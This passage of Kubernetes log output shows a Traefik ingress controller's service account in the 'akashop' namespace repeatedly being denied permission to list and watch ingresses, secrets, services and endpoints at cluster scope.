ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:51:13.946537 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:51:14.607302 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:51:14.607351 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:51:51.473062 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:51:51.473209 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:51:55.946201 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:51:55.946384 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:52:00.373593 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:52:00.373624 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:52:03.740836 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:52:03.740874 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:52:40.645728 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:52:40.645768 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:52:42.292086 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:52:42.292169 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:52:53.706796 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:52:53.706837 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:52:56.019369 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:52:56.019405 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:53:26.483609 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:53:26.483640 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:53:27.071997 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:53:27.072028 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:53:36.185942 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:53:36.185986 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:53:39.925038 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:53:39.925076 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:54:09.113785 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:54:09.113888 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:54:09.320242 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:54:09.320325 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:54:12.976994 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:54:12.977024 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:54:19.158065 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:54:19.158106 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:54:58.673428 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:54:58.673495 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:54:59.920118 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:54:59.920160 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:55:00.896384 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:55:00.896424 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:55:04.959686 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:55:04.959713 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:55:40.431392 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:55:40.431433 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:55:51.029739 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:55:51.029774 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:55:52.215056 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:55:52.215098 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:56:01.244031 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:56:01.244061 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:56:21.348137 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:56:21.348168 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:56:35.090967 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:56:35.091110 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:56:39.428045 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:56:39.428083 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:56:49.054118 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:56:49.054153 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:57:13.264297 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:57:13.264352 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:57:15.974848 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:57:15.974885 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:57:29.831069 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:57:29.831118 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:57:32.429855 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:57:32.429912 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:57:48.456938 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:57:48.456973 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:57:52.141538 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:57:52.141631 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:58:20.682203 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:58:20.682233 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:58:26.497592 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:58:26.497627 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:58:26.590873 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:58:26.590905 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:58:32.961568 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:58:32.961602 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:59:01.326367 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:59:01.326411 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:59:04.664851 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:59:04.665040 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:59:19.895987 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:59:19.896025 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:59:24.470039 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:59:24.470267 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:59:52.653725 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:59:52.653760 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:59:55.737456 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:59:55.737492 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:00:03.710790 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:00:03.710829 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:00:18.826178 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:00:18.826215 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:00:22.708470 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:00:22.708507 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:00:29.734507 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:00:29.734543 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:00:59.135177 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:00:59.135203 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:01:05.524794 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:01:05.524873 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:01:10.031784 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:01:10.031819 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:01:15.321679 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:01:15.321709 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:01:34.802859 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:01:34.802904 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:01:51.788473 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:01:51.788711 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:01:51.867795 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:01:51.867877 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" 